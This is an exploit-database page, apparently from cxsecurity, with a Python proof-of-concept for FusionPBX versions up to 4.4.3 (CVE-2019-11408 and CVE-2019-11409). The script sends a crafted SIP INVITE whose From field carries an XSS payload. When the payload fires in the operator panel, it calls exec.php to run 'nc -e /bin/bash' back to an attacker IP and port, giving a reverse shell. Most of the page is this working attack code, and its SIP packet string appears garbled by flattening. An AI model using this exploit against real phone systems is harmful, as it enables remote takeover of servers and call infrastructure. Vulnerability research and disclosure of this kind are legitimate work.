FusionPBX 4.4.3 Remote Command Execution

Credit: Dustin Cobb
Risk: High
Local: No
Remote: Yes

# Exploit Title: FusionPBX <= 4.4.3 Command Injection RCE via XSS # Date: 06-11-2019 # Exploit Author: Dustin Cobb # Vendor Homepage: https://www.fusionpbx.com # Software Link: https://https://github.com/fusionpbx/fusionpbx # Version: <= 4.4.3 # Tested on: Debian 8.11 # CVE : CVE-2019-11408 (XSS) AND CVE-2019-11409 (Command Injection RCE) #!/usr/bin/python import socket, sys from random import randint from hashlib import md5 # Exploitation steps: # # 1. First, encode an XSS payload that will be injected into the # “Caller ID Number” field, or “User” component of the SIP # “From” URI. # 2. Connect to external SIP profile port and send a SIP INVITE # packet with XSS payload injected into the From Field. # 3. XSS payload will fire operator panel screen (CVE-2019-11408), which # is designed to be monitored constantly by a call center operator. # 4. Once XSS code executes, a call is made to the exec.php script # (CVE-2019-11409) with a reverse shell payload that connects back to # a netcat listener on the attacker system. # edit these variables to set up attack victim_addr="" victim_host="victim-pbx1.example.com" victim_num="12125551212" attacker_ip="" attacker_port=4444 def encode(val): ret="" for c in val: ret+="\\x%02x" % ord(c) return ret callid=md5(str(randint(0,99999999))).hexdigest() cmd="nc -e /bin/bash %s %d" % (attacker_ip, attacker_port) payload="q=new XMLHttpRequest();q.open('GET','exec.php?cmd=system %s',true);q.send();" % cmd xss=";tag=%s To: Call-ID: %s CSeq: 1 INVITE Contact: Max-Forwards: 70 User-Agent: Exploit POC Content-Type: application/sdp Allow: INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE, MESSAGE Content-Length: 209 v=0 o=root 1204310316 1204310316 IN IP4 s=Media Gateway c=IN IP4 t=0 0 m=audio 4446 RTP/AVP 0 101 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:2 a=sendrecv""" % (victim_num, victim_host, xss, callid, victim_num, victim_host, callid) payload=payload.replace("\n","\r\n") s=socket.socket() s.connect((victim_addr,5080)) print payload print s.send(payload) data=s.recv(8192) print data

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com


Back to Top